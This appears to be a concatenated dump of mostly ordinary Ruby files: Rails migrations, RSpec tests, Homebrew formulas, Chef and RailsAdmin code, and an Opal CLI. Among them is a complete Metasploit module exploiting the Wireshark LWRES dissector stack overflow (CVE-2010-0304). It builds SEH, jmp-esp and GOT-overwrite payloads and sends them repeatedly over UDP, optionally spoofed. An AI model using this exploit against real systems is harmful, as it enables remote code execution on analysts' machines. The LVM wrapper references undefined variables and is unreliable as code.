    add_reference :ideas, :assigned_user, foreign_key: { to_table: :users }
  end
end
| 23.75 | 75 | 0.763158 |
18db711cc3c0e23ebe9c72b10784e3fafad071fc | 8,715 | ##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
# Metasploit exploit for the Wireshark LWRES dissector stack overflow
# (CVE-2010-0304). Sends a malformed getaddrsbyname request in a loop until
# the job is killed or a session is created.
class Metasploit3 < Msf::Exploit::Remote
  Rank = GreatRanking

  # Mixins: UDP transport, SEH record helpers, raw-packet capture/injection.
  include Msf::Exploit::Remote::Udp
  include Msf::Exploit::Remote::Seh
  include Msf::Exploit::Capture

  # Registers module metadata, per-platform targets and datastore options.
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow (loop)',
      'Description' => %q{
          The LWRES dissector in Wireshark version 0.9.15 through 1.0.10 and 1.2.0 through
          1.2.5 allows remote attackers to execute arbitrary code due to a stack-based buffer
          overflow. This bug found and reported by babi.
          This particular exploit targets the dissect_getaddrsbyname_request function. Several
          other functions also contain potentially exploitable stack-based buffer overflows.
          The Windows version (of 1.2.5 at least) is compiled with /GS, which prevents
          exploitation via the return address on the stack. Sending a larger string allows
          exploitation using the SEH bypass method. However, this packet will usually get
          fragmented, which may cause additional complications.
          NOTE: The vulnerable code is reached only when the packet dissection is rendered.
          If the packet is fragmented, all fragments must be captured and reassembled to
          exploit this issue.
          This version loops, sending the packet every X seconds until the job is killed.
      },
      'Author' =>
        [
          'babi', # original discovery/exploit
          'jduck', # ported from public exploit
          'redsand' # windows target/testing
        ],
      'License' => MSF_LICENSE,
      'References' =>
        [
          [ 'CVE', '2010-0304' ],
          [ 'OSVDB', '61987' ],
          [ 'BID', '37985' ],
          [ 'URL', 'http://www.wireshark.org/security/wnpa-sec-2010-02.html' ],
          [ 'URL', 'http://anonsvn.wireshark.org/viewvc/trunk-1.2/epan/dissectors/packet-lwres.c?view=diff&r1=31596&r2=28492&diff_format=h' ]
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },
      'Privileged' => true, # at least capture privilege
      'Payload' =>
        {
          'Space' => 512,
          'BadChars' => "\x00",
          'DisableNops' => true,
        },
      'DefaultTarget' => 4,
      'Platform' => %w{ linux osx win },
      # Each target carries the overflow offset (RetOff) and the
      # technique-specific addresses used by #exploit below.
      'Targets' =>
        [
          [ 'tshark 1.0.2-3+lenny7 on Debian 5.0.3 (x86)',
            # breakpoint: lwres.so + 0x2ce2
            {
              'Arch' => ARCH_X86,
              'Platform' => 'linux',
              # conveniently, edx pointed at our string..
              # and so, we write it to g_slist_append's GOT entry just before its called.
              # pwnt.
              #
              # mov [ebx+0xc],edx / jmp 0x804fc40 -->
              # mov [esp+4],eax / mov eax,[edi+8] / mov [esp],eax / call g_slist_append
              #
              'Ret' => 0x804fc85, # see above..
              'RetOff' => 376,
              'Readable' => 0x804fa04, # just anything
              'GotAddr' => 0x080709c8 # objdump -R tshark | grep g_slist_append
            }
          ],
          [ 'wireshark 1.0.2-3+lenny7 on Debian 5.0.3 (x86)',
            {
              'Arch' => ARCH_X86,
              'Platform' => 'linux',
              # the method for tshark doesn't work, since there aren't any convenient
              # pointers lying around (in reg/close on stack)
              #
              # since the wireshark bin has a jmp esp, we'll just use that method..
              'Ret' => 0x818fce8, # jmp esp in wireshark bin
              'RetOff' => 376,
              'Readable' => 0x8066a40, # just any old readable addr (unused)
              'GotAddr' => 0x818601c # objdump -R wireshark | grep g_slist_append (unused)
            }
          ],
          [ 'wireshark 1.2.5 on RHEL 5.4 (x64)',
            {
              'Arch' => ARCH_X86_64,
              'Platform' => 'linux',
              'Ret' => 0xfeedfed5deadbeef,
              'RetOff' => 152,
            }
          ],
          [ 'wireshark 1.2.5 on Mac OS X 10.5 (x86)',
            {
              'Arch' => ARCH_X86,
              'Platform' => 'osx',
              'Ret' => 0xdeadbeef,
              'RetOff' => 268,
            }
          ],
          # The following target was tested against Windows XP SP3 and Windows Vista
          [ 'wireshark/tshark 1.2.1 and 1.2.5 on Windows (x86)',
            {
              'Arch' => ARCH_X86,
              'Platform' => 'win',
              # NOTE: due to the length of this packet, your mileage may vary.
              'Ret' => 0x61B4121B,
              # 0x655810b6 = pop/pop/ret in libpango
              # 0x02A110B6 = pop/pop/ret in libgtk-w
              # 0x03D710CC = pop/mov/pop/ret in packet
              # 0x61B4121B = pop/pop/ret in pcre3
              'RetOff' => 2128,
            }
          ],
        ],
      'DisclosureDate' => 'Jan 27 2010',
      # Set it to passive mode to background it.
      'Stance' => Msf::Exploit::Stance::Passive))

    register_options([
      Opt::RPORT(921),
      Opt::RHOST("239.255.255.250"),
      OptAddress.new( 'SHOST', [false, 'This option can be used to specify a spoofed source address', nil]),
      OptInt.new( 'DELAY', [true, 'This option sets the delay between sent packets', 5])
    ], self.class)

    register_advanced_options([
      OptBool.new("ExitOnSession", [ false, "Return from the exploit after a session has been created", true ])
    ], self.class)

    deregister_options('FILTER','PCAPFILE')
  end

  # Builds the overflow string for the selected target and sends the
  # malformed LWRES packet in a loop (spoofed via pcap when SHOST is set,
  # otherwise over a plain UDP socket).
  def exploit
    check_pcaprub_loaded # Check first

    ret_offset = target['RetOff']

    # we have different techniques depending on the target
    if (target == targets[0])
      # debian tshark
      str = make_nops(ret_offset - payload.encoded.length - 16)
      str << payload.encoded
      str << [target['GotAddr'] - 0xc].pack('V')
      str << rand_text(4)
      str << [target['Readable']].pack('V')
      str << rand_text(4)
      # ret is next
    elsif (target == targets[1])
      fix_esp = Metasm::Shellcode.assemble(Metasm::Ia32.new, "add esp,-3500").encode_string
      str = make_nops(ret_offset - fix_esp.length - payload.encoded.length)
      str << fix_esp
      str << payload.encoded
      # jmp esp...
      str << [target.ret].pack('V')
      # jump back
      distance = ret_offset + 4
      str << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + distance.to_s).encode_string
    elsif (target == targets[4])
      # ugh, /GS and UDP length issues :-/
      str = make_nops(ret_offset - payload.encoded.length)
      str << payload.encoded
      str << generate_seh_record(target.ret)
      # jump back
      distance = ret_offset + 8
      str << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + distance.to_s).encode_string
    else
      # this is just a simple DoS payload
      str = Rex::Text.pattern_create(ret_offset)
      #str << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $+6").encode_string
    end

    # add return address
    #XXX: this isn't working?
    #str << Rex::Arch.pack_addr(target.arch, target.ret)
    str << [target.ret].pack('V')

    # form the packet's payload!
    sploit = "\x00\x00\x01\x5d\x00\x00\x00\x00\x4b\x49\x1c\x52\x00\x01\x00\x01"
    sploit << "\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    sploit << "\x00\x00\x00\x01"
    sploit << [str.length].pack('n')
    sploit << str
    sploit << "\x00\x00"

    shost = datastore['SHOST']
    if (shost)
      print_status("Sending malformed LWRES packet (spoofed from #{shost})")

      open_pcap

      p = PacketFu::UDPPacket.new
      p.ip_saddr = datastore['SHOST'] || Rex::Socket.source_address(rhost)
      p.ip_daddr = rhost
      p.udp_sport = rand((2**16)-1024)+1024
      p.udp_dport = datastore['RPORT'].to_i
      p.payload = sploit
      p.recalc

      # Keep injecting until the job is killed, sending fails, or (when
      # ExitOnSession is set) a session comes back.
      while true
        break if session_created? and datastore['ExitOnSession']
        break unless capture_sendto(p, rhost)
        select(nil,nil,nil,datastore['DELAY'])
      end

      close_pcap

      handler
    else
      print_status("Sending malformed LWRES packet every #{datastore['DELAY']} seconds.")

      handler

      while true
        break if session_created? and datastore['ExitOnSession']
        connect_udp
        udp_sock.put(sploit)
        disconnect_udp
        select(nil,nil,nil,datastore['DELAY'])
      end
    end
  end
end
1adb6de00a371be0f351370975e641ca881389f8 | 962 | require "spec_helper"
describe Chartmogul::Import::Plan do
  describe ".create" do
    it "creates a new plan" do
      plan_attributes = {
        data_source_uuid: "ds_uuid_001",
        name: "Bronze Plan",
        interval_count: 1,
        interval_unit: "month",
        external_id: "plan_001"
      }
      # stub_plan_create_api is a spec helper stubbing the HTTP endpoint.
      stub_plan_create_api(plan_attributes)
      plan = Chartmogul::Import::Plan.create(plan_attributes)
      expect(plan.uuid).not_to be_nil
      expect(plan.name).to eq(plan_attributes[:name])
      expect(plan.data_source_uuid).to eq(plan_attributes[:data_source_uuid])
    end
  end

  describe ".list" do
    it "lists all the plans" do
      listing_options = { page: 1, per_page: 3 }
      stub_plan_list_api(listing_options)
      plans = Chartmogul::Import::Plan.list(listing_options)
      # The stub returns one page of three plans.
      expect(plans.current_page).to eq(1)
      expect(plans.plans.count).to eq(3)
      expect(plans.plans.first.uuid).not_to be_nil
    end
  end
end
| 27.485714 | 77 | 0.66632 |
e98c0f1fa6b4b0f0319449cf5afff6b0b3c29eed | 1,367 | #
# Cookbook Name:: chef-odi-base
# Recipe:: default
#
# Copyright (C) 2014 The Open Data Institute
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
# Baseline recipe set applied to every node. Ordering: apt sources first so
# subsequent recipes install from the expected repositories, then the
# chef-client configuration/cron schedule, then the shared tooling recipes.
include_recipe 'odi-apt'
include_recipe 'chef-client::config'
include_recipe 'chef-client::cron'
include_recipe 'odi-monitoring'
include_recipe 'git'
include_recipe 'odi-pk'
include_recipe 'envbuilder'
| 36.945946 | 72 | 0.776152 |
0819c92a0f9002792ee24508d41f1d7a3473d867 | 130 | class ChangeStartTimeToBigInt2 < ActiveRecord::Migration[5.2]
def change
add_column :routes, :start_time, :bigint
end
end
| 21.666667 | 61 | 0.761538 |
1aee184fe2c35e89ba3e5064eb4faa3cd8df308b | 12,021 | require "spec_helper"
require "ruby_utils/statistic"
require "wrf_forecast/threshold"
require "wrf_forecast/text"
describe WrfForecast::Text::TemperatureText do
describe ".new" do
context "given an array of temperature data for an ice day" do
it "generate and check temperature forecast text" do
temperature_values = [ 268, 268, 268, 268, 267, 267, 267, 267, 266, 266,
266, 266, 265, 265, 265, 265, 266, 266, 266, 266,
267, 267, 268, 268, 269, 269, 270, 270, 271, 271,
271, 271, 272, 272, 271, 271, 271, 270, 270, 270,
269, 269, 269, 269, 268, 268, 268, 268, 268, 267
]
indicators = WrfForecast::Threshold::TemperatureThreshold.new(temperature_values)
extreme_values = RubyUtils::ExtremeValues.new(265.15, 272.15)
forecast = WrfForecast::Text::TemperatureText.new(extreme_values, indicators.indicators)
expected = I18n.t("forecast_text.temperature.text_start")
expected.concat(I18n.t("forecast_text.temperature.warmth_very_frosty"))
expected.concat(I18n.t("forecast_text.temperature.text_day")).concat(".")
expected.concat(I18n.t("forecast_text.temperature.text_maximum")).concat("-1")
expected.concat(I18n.t("forecast_text.temperature.text_minimum")).concat("-8")
expected.concat(I18n.t("forecast_text.temperature.text_finish"))
expect(forecast.text).to eq(expected)
end
end
end
describe ".new" do
context "given an array of temperature data for a frost day" do
it "generate and check temperature forecast text" do
temperature_values = [ 268, 268, 268, 268, 267, 267, 267, 267, 266, 266,
266, 266, 265, 265, 265, 265, 266, 266, 266, 266,
267, 267, 268, 268, 269, 269, 270, 270, 271, 271,
272, 272, 273, 274, 271, 271, 271, 270, 270, 270,
269, 269, 269, 269, 268, 268, 268, 268, 268, 267
]
indicators = WrfForecast::Threshold::TemperatureThreshold.new(temperature_values)
extreme_values = RubyUtils::ExtremeValues.new(265.15, 274.15)
forecast = WrfForecast::Text::TemperatureText.new(extreme_values, indicators.indicators)
expected = I18n.t("forecast_text.temperature.text_start")
expected.concat(I18n.t("forecast_text.temperature.warmth_cold"))
expected.concat(I18n.t("forecast_text.temperature.text_day")).concat(".")
expected.concat(I18n.t("forecast_text.temperature.text_maximum")).concat("1")
expected.concat(I18n.t("forecast_text.temperature.text_minimum")).concat("-8")
expected.concat(I18n.t("forecast_text.temperature.text_finish"))
expect(forecast.text).to eq(expected)
end
end
end
describe ".new" do
context "given an array of temperature data for a spring day" do
it "generate and check temperature forecast text" do
temperature_values = [ 278, 278, 278, 278, 277, 277, 277, 277, 276, 276,
276, 276, 275, 275, 275, 275, 276, 276, 276, 276,
277, 277, 278, 278, 279, 279, 280, 280, 281, 281,
281, 281, 282, 282, 281, 281, 281, 280, 280, 280,
279, 279, 279, 279, 278, 278, 278, 278, 278, 277
]
indicators = WrfForecast::Threshold::TemperatureThreshold.new(temperature_values)
extreme_values = RubyUtils::ExtremeValues.new(275.15, 282.15)
forecast = WrfForecast::Text::TemperatureText.new(extreme_values, indicators.indicators)
expected = I18n.t("forecast_text.temperature.text_start")
expected.concat(I18n.t("forecast_text.temperature.warmth_normal"))
expected.concat(I18n.t("forecast_text.temperature.text_day")).concat(".")
expected.concat(I18n.t("forecast_text.temperature.text_maximum")).concat("9")
expected.concat(I18n.t("forecast_text.temperature.text_minimum")).concat("2")
expected.concat(I18n.t("forecast_text.temperature.text_finish"))
expect(forecast.text).to eq(expected)
end
end
end
describe ".new" do
context "given an array of temperature data for a summer day" do
it "generate and check temperature forecast text" do
temperature_values = [ 290, 290, 290, 290, 289, 289, 289, 289, 288, 288,
289, 289, 290, 290, 291, 291, 292, 292, 293, 293,
294, 295, 296, 297, 298, 299, 300, 300, 300, 300,
300, 301, 301, 300, 300, 299, 298, 297, 296, 295,
294, 294, 293, 293, 292, 292, 291, 291, 290, 290
]
indicators = WrfForecast::Threshold::TemperatureThreshold.new(temperature_values)
extreme_values = RubyUtils::ExtremeValues.new(288.15, 301.05)
forecast = WrfForecast::Text::TemperatureText.new(extreme_values, indicators.indicators)
expected = I18n.t("forecast_text.temperature.text_start")
expected.concat(I18n.t("forecast_text.temperature.warmth_summer"))
expected.concat(I18n.t("forecast_text.temperature.text_day")).concat(".")
expected.concat(I18n.t("forecast_text.temperature.text_maximum")).concat("28")
expected.concat(I18n.t("forecast_text.temperature.text_minimum")).concat("15")
expected.concat(I18n.t("forecast_text.temperature.text_finish"))
expect(forecast.text).to eq(expected)
end
end
end
describe ".new" do
context "given an array of temperature data for a hot day with tropical night" do
it "generate and check temperature forecast text" do
temperature_values = [ 296, 296, 296, 295, 295, 295, 294, 294, 294, 294,
295, 295, 296, 296, 297, 297, 298, 298, 299, 299,
300, 300, 301, 301, 302, 302, 303, 303, 304, 304,
305, 305, 304, 304, 303, 303, 302, 302, 301, 300,
299, 299, 298, 298, 297, 297, 296, 296, 296, 296
]
indicators = WrfForecast::Threshold::TemperatureThreshold.new(temperature_values)
extreme_values = RubyUtils::ExtremeValues.new(294.15, 305.25)
forecast = WrfForecast::Text::TemperatureText.new(extreme_values, indicators.indicators)
expected = I18n.t("forecast_text.temperature.text_start")
expected.concat(I18n.t("forecast_text.temperature.warmth_hot"))
expected.concat(I18n.t("forecast_text.temperature.text_day"))
expected.concat(I18n.t("forecast_text.temperature.warmth_tropical")).concat(".")
expected.concat(I18n.t("forecast_text.temperature.text_maximum")).concat("33")
expected.concat(I18n.t("forecast_text.temperature.text_minimum")).concat("21")
expected.concat(I18n.t("forecast_text.temperature.text_finish"))
expect(forecast.text).to eq(expected)
end
end
end
describe ".new" do
context "given an array of temperature data for an ice day" do
it "generate and check temperature warning text" do
temperature_values = [ 268, 268, 268, 268, 267, 267, 267, 267, 266, 266,
266, 266, 265, 265, 265, 265, 266, 266, 266, 266,
267, 267, 268, 268, 269, 269, 270, 270, 271, 271,
271, 271, 272, 272, 271, 271, 271, 270, 270, 270,
269, 269, 269, 269, 268, 268, 268, 268, 268, 267
]
indicators = WrfForecast::Threshold::TemperatureThreshold.new(temperature_values)
extreme_values = RubyUtils::ExtremeValues.new(265.15, 272.15)
forecast = WrfForecast::Text::TemperatureText.new(extreme_values, indicators.indicators)
expect(forecast.warnings).to eq(I18n.t("threshold.temperature.ice_day"))
end
end
end
describe ".new" do
context "given an array of temperature data for a frost day" do
it "generate and check temperature warning text" do
temperature_values = [ 268, 268, 268, 268, 267, 267, 267, 267, 266, 266,
266, 266, 265, 265, 265, 265, 266, 266, 266, 266,
267, 267, 268, 268, 269, 269, 270, 270, 271, 271,
272, 272, 273, 274, 271, 271, 271, 270, 270, 270,
269, 269, 269, 269, 268, 268, 268, 268, 268, 267
]
indicators = WrfForecast::Threshold::TemperatureThreshold.new(temperature_values)
extreme_values = RubyUtils::ExtremeValues.new(265.15, 274.15)
forecast = WrfForecast::Text::TemperatureText.new(extreme_values, indicators.indicators)
expect(forecast.warnings).to eq(I18n.t("threshold.temperature.frost_day"))
end
end
end
describe ".new" do
context "given an array of temperature data for a spring day" do
it "generate and check temperature forecast text" do
temperature_values = [ 278, 278, 278, 278, 277, 277, 277, 277, 276, 276,
276, 276, 275, 275, 275, 275, 276, 276, 276, 276,
277, 277, 278, 278, 279, 279, 280, 280, 281, 281,
281, 281, 282, 282, 281, 281, 281, 280, 280, 280,
279, 279, 279, 279, 278, 278, 278, 278, 278, 277
]
indicators = WrfForecast::Threshold::TemperatureThreshold.new(temperature_values)
extreme_values = RubyUtils::ExtremeValues.new(275.15, 282.15)
forecast = WrfForecast::Text::TemperatureText.new(extreme_values, indicators.indicators)
expect(forecast.warnings).to be_empty
end
end
end
describe ".new" do
context "given an array of temperature data for a summer day" do
it "generate and check temperature forecast text" do
temperature_values = [ 290, 290, 290, 290, 289, 289, 289, 289, 288, 288,
289, 289, 290, 290, 291, 291, 292, 292, 293, 293,
294, 295, 296, 297, 298, 299, 300, 300, 300, 300,
300, 301, 301, 300, 300, 299, 298, 297, 296, 295,
294, 294, 293, 293, 292, 292, 291, 291, 290, 290
]
indicators = WrfForecast::Threshold::TemperatureThreshold.new(temperature_values)
extreme_values = RubyUtils::ExtremeValues.new(288.15, 301.05)
forecast = WrfForecast::Text::TemperatureText.new(extreme_values, indicators.indicators)
expect(forecast.warnings).to eq(I18n.t("threshold.temperature.summer_day"))
end
end
end
describe ".new" do
context "given an array of temperature data for a hot day with tropical night" do
it "generate and check temperature forecast text" do
temperature_values = [ 296, 296, 296, 295, 295, 295, 294, 294, 294, 294,
295, 295, 296, 296, 297, 297, 298, 298, 299, 299,
300, 300, 301, 301, 302, 302, 303, 303, 304, 304,
305, 305, 304, 304, 303, 303, 302, 302, 301, 300,
299, 299, 298, 298, 297, 297, 296, 296, 296, 296
]
indicators = WrfForecast::Threshold::TemperatureThreshold.new(temperature_values)
extreme_values = RubyUtils::ExtremeValues.new(294.15, 305.25)
forecast = WrfForecast::Text::TemperatureText.new(extreme_values, indicators.indicators)
expected = I18n.t("threshold.temperature.hot_day")
expected.concat("\n").concat(I18n.t("threshold.temperature.tropical_night"))
expect(forecast.warnings).to eq(expected)
end
end
end
end
| 56.70283 | 96 | 0.598536 |
class Editorconfig < Formula
desc "Maintain consistent coding style between multiple editors"
homepage "https://editorconfig.org/"
url "https://github.com/editorconfig/editorconfig-core-c/archive/v0.12.4.tar.gz"
sha256 "c2671595f1793b498cdf50b9dc03d632cc724891de7909f2ea78588fbffba289"
license "BSD-2-Clause"
head "https://github.com/editorconfig/editorconfig-core-c.git"
bottle do
sha256 cellar: :any, arm64_big_sur: "c6d2a8fe0234a4cc7919238c801c2a57c729f50e8d70ee6078d412cff6ef5d08"
sha256 cellar: :any, big_sur: "78142363e9004adc7286f2393e1bfd663dc55d85225d84da75c285d3dfa021e4"
sha256 cellar: :any, catalina: "efae02b7bab638b75b39abf29163349119b993697210e3dfeca5456f610241ec"
sha256 cellar: :any, mojave: "523459616f8fdf7507c66c4c531e329e8bf37c08633e72401de47fdd010990a6"
sha256 cellar: :any, high_sierra: "0f41e7e368a435f1680195d86b7eabbfd46f40a0905bd8dd8b52e199d92fc3f3"
end
depends_on "cmake" => :build
depends_on "pcre2"
def install
mkdir "build" do
system "cmake", "..", *std_cmake_args, "-DCMAKE_INSTALL_RPATH=#{rpath}"
system "make", "install"
end
end
test do
system "#{bin}/editorconfig", "--version"
end
end
| 39.258065 | 106 | 0.762531 |
module Postmarkdown
  # Installs Postmarkdown into a Rails application: creates the posts
  # directory, optionally generates an example post, and mounts the routes.
  class InstallGenerator < Rails::Generators::Base
    desc File.read(File.expand_path('../usage/install.txt', __FILE__)).gsub('{{CURRENT_DATE}}', Time.zone.now.strftime('%Y-%m-%d'))
    source_root File.expand_path('../templates', __FILE__)

    class_option :skip_example, :type => :boolean, :group => :runtime, :desc => 'Skip generating an example post'

    # Ensure the directory that will hold markdown posts exists.
    def create_directory
      empty_directory 'app/posts'
    end

    # Create a sample post unless the user opted out via --skip-example.
    def generate_example_post
      return if options.skip_example?
      generate 'postmarkdown:post', 'example-post'
    end

    # Insert the postmarkdown route right after the routes.draw line.
    def add_routes
      insert_into_file 'config/routes.rb', "  postmarkdown :as => :posts\n\n", :after => "::Application.routes.draw do\n"
    end
  end
end
bbc39c5e31656876f69b85a2aa5d6ef779a741a2 | 499 | class Builder
attr_accessor :title, :date, :slug, :image, :lectures_path, :templates_path
def initialize(attributes)
attributes.each do |key, value|
send "#{key}=", value
end
end
def html
input = File.read source_file
lecture = Lecture.new input, title, date, image
lecture.render(layout_file: "#{templates_path}/html/layout.slim")
end
def output_filename
"#@slug.html"
end
private
def source_file
"#{lectures_path}/#@slug.slim"
end
end
| 18.481481 | 77 | 0.669339 |
edcbf40b53e7ea0d17b47ddad2e689c0c1da83a3 | 3,255 | module RailsAdmin
module Config
# Model specific configuration object.
class Model
include RailsAdmin::Config::Proxyable
include RailsAdmin::Config::Configurable
include RailsAdmin::Config::Hideable
include RailsAdmin::Config::Sections
include RailsAdmin::Config::Inspectable
attr_reader :abstract_model
attr_accessor :groups
attr_reader :parent, :root
NAMED_INSTANCE_VARIABLES = [:@parent, :@root].freeze
def initialize(entity)
@parent = nil
@root = self
@abstract_model = begin
if entity.is_a?(RailsAdmin::AbstractModel)
entity
elsif entity.is_a?(Class) || entity.is_a?(String) || entity.is_a?(Symbol)
RailsAdmin::AbstractModel.new(entity)
else
RailsAdmin::AbstractModel.new(entity.class)
end
end
@groups = [RailsAdmin::Config::Fields::Group.new(self, :default).tap { |g| g.label { I18n.translate('admin.form.basic_info') } }]
end
def excluded?
@excluded ||= !RailsAdmin::AbstractModel.all.collect(&:model_name).include?(abstract_model.try(:model_name))
end
def object_label
bindings[:object].send(object_label_method).presence ||
bindings[:object].send(:rails_admin_default_object_label_method)
end
# The display for a model instance (i.e. a single database record).
# Unless configured in a model config block, it'll try to use :name followed by :title methods, then
# any methods that may have been added to the label_methods array via Configuration.
# Failing all of these, it'll return the class name followed by the model's id.
register_instance_option :object_label_method do
@object_label_method ||= Config.label_methods.detect { |method| (@dummy_object ||= abstract_model.model.new).respond_to? method } || :rails_admin_default_object_label_method
end
register_instance_option :label do
(@label ||= {})[::I18n.locale] ||= abstract_model.model.model_name.human
end
register_instance_option :label_plural do
(@label_plural ||= {})[::I18n.locale] ||= abstract_model.model.model_name.human(count: Float::INFINITY, default: label.pluralize(::I18n.locale))
end
def pluralize(count)
count == 1 ? label : label_plural
end
register_instance_option :weight do
0
end
# parent node in navigation/breadcrumb
register_instance_option :parent do
@parent_model ||= begin
klass = abstract_model.model.superclass
klass = nil if klass.to_s.in?(%w(Object BasicObject ActiveRecord::Base))
klass
end
end
register_instance_option :navigation_label do
@navigation_label ||= begin
if (parent_module = abstract_model.model.parent) != Object
parent_module.to_s
end
end
end
register_instance_option :navigation_icon do
nil
end
# Act as a proxy for the base section configuration that actually
# store the configurations.
def method_missing(m, *args, &block)
send(:base).send(m, *args, &block)
end
end
end
end
| 34.263158 | 181 | 0.653149 |
21e7485737111b60da023ab65fcc9af2361eca6b | 543 | require 'lvm/wrapper'
require 'lvm/wrapper/pvs'
require 'lvm/physical_volume_helper'
module LVM
module Wrapper
module VGExtend
# Extend a LVM Volume Group.
# See vor vgextend command http://linux.die.net/man/8/vgextend
def vg_extend(volume_group, physical_volumes)
External.cmd(@server, "#{@command} vgextend #{volume_group.name} #{physical_volumes_to_s(physical_volumes_array)}") if physical_volumes_unused(physical_volumes_array)
end
end # module VGExtend
end # module Wrapper
end # module LVM
| 30.166667 | 174 | 0.736648 |
1aeaa1e9d252816ec1a5a498065c9af437465956 | 1,712 | # encoding: utf-8
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::CDN::Mgmt::V2020_09_01
  module Models
    #
    # Defines the RemoteAddress condition for the delivery rule.
    #
    class DeliveryRuleRemoteAddressCondition < DeliveryRuleCondition
      include MsRestAzure
      # Sets the polymorphic discriminator for this condition type.
      def initialize
        @name = "RemoteAddress"
      end
      # @return [String] polymorphic discriminator; always "RemoteAddress".
      attr_accessor :name
      # @return [RemoteAddressMatchConditionParameters] Defines the parameters
      # for the condition.
      attr_accessor :parameters
      #
      # Mapper for DeliveryRuleRemoteAddressCondition class as Ruby Hash.
      # This will be used for serialization/deserialization.
      #
      def self.mapper()
        {
          client_side_validation: true,
          required: false,
          serialized_name: 'RemoteAddress',
          type: {
            name: 'Composite',
            class_name: 'DeliveryRuleRemoteAddressCondition',
            model_properties: {
              name: {
                client_side_validation: true,
                required: true,
                serialized_name: 'name',
                type: {
                  name: 'String'
                }
              },
              parameters: {
                client_side_validation: true,
                required: true,
                serialized_name: 'parameters',
                default_value: {},
                type: {
                  name: 'Composite',
                  class_name: 'RemoteAddressMatchConditionParameters'
                }
              }
            }
          }
        }
      end
    end
  end
end
| 26.338462 | 78 | 0.550234 |
26276ee7b117041ff54a6ad6e4248f16b25c742b | 4,451 | require 'opal'
require 'rack'
require 'opal/builder'
require 'opal/cli_runners'
module Opal
class CLI
attr_reader :options, :file, :compiler_options, :evals, :load_paths, :argv,
:output, :requires, :gems, :stubs, :verbose, :port, :preload,
:filename, :debug, :no_exit
def compile?
@compile
end
def sexp?
@sexp
end
def skip_opal_require?
@skip_opal_require
end
class << self
attr_accessor :stdout
end
def initialize options = nil
options ||= {}
# Runner
@runner_type = options.delete(:runner) || :nodejs
@port = options.delete(:port) || 3000
@options = options
@compile = !!options.delete(:compile)
@sexp = options.delete(:sexp)
@file = options.delete(:file)
@no_exit = options.delete(:no_exit)
@argv = options.delete(:argv) || []
@evals = options.delete(:evals) || []
@requires = options.delete(:requires) || []
@load_paths = options.delete(:load_paths) || []
@gems = options.delete(:gems) || []
@stubs = options.delete(:stubs) || []
@preload = options.delete(:preload) || []
@output = options.delete(:output) || self.class.stdout || $stdout
@verbose = options.fetch(:verbose, false); options.delete(:verbose)
@debug = options.fetch(:debug, false); options.delete(:debug)
@filename = options.fetch(:filename) { @file && @file.path }; options.delete(:filename)
@skip_opal_require = options.delete(:skip_opal_require)
@compiler_options = Hash[
*compiler_option_names.map do |option|
key = option.to_sym
next unless options.has_key? key
value = options.delete(key)
[key, value]
end.compact.flatten
]
raise ArgumentError, "no runnable code provided (evals or file)" if @evals.empty? and @file.nil?
raise ArgumentError, "unknown options: #{options.inspect}" unless @options.empty?
end
def run
case
when sexp?; show_sexp
when compile?; show_compiled_source
else run_code
end
end
def runner
@runner ||= case @runner_type
when :server; CliRunners::Server.new(output, port)
when :nodejs; CliRunners::Nodejs.new(output)
when :phantomjs; CliRunners::Phantomjs.new(output)
when :applescript; CliRunners::AppleScript.new(output)
else raise ArgumentError, @runner_type.inspect
end
end
def run_code
runner.run(compiled_source, argv)
@exit_status = runner.exit_status
end
attr_reader :exit_status
def compiled_source
Opal.paths.concat load_paths
gems.each { |gem_name| Opal.use_gem gem_name }
builder = Opal::Builder.new stubs: stubs, compiler_options: compiler_options
builder.build 'opal' unless skip_opal_require?
preload.each { |path| builder.build_require(path) }
# FLAGS
builder.build_str '$VERBOSE = true', '(flags)' if verbose
builder.build_str '$DEBUG = true', '(flags)' if debug
# REQUIRES: -r
requires.each do |local_require|
builder.build(local_require)
end
if evals.any?
builder.build_str(evals.join("\n"), '-e')
else
if file and (filename != '-' or evals.empty?)
builder.build_str(file.read, filename)
end
end
builder.build_str 'Kernel.exit', '(exit)' unless no_exit
builder.to_s
end
def show_compiled_source
puts compiled_source
end
def show_sexp
if evals.any?
sexp = Opal::Parser.new.parse(evals.join("\n"), '-e')
else
if file and (file.path != '-' or evals.empty?)
sexp = Opal::Parser.new.parse(file.read, file.path)
end
end
puts sexp.inspect
end
def map
compiler = Opal::Compiler.compile(file.read, options.merge(:file => file.path))
compiler.compile
compiler.source_map
end
def compiler_option_names
%w[
method_missing
arity_check
dynamic_require_severity
source_map_enabled
irb_enabled
inline_operators
]
end
def puts(*args)
output.puts(*args)
end
end
end
| 27.81875 | 102 | 0.585037 |
6a241201e576fcfa45db5795c463badcc6538003 | 963 | class Pwgen < Formula
desc "Password generator"
homepage "https://pwgen.sourceforge.io/"
url "https://downloads.sourceforge.net/project/pwgen/pwgen/2.08/pwgen-2.08.tar.gz"
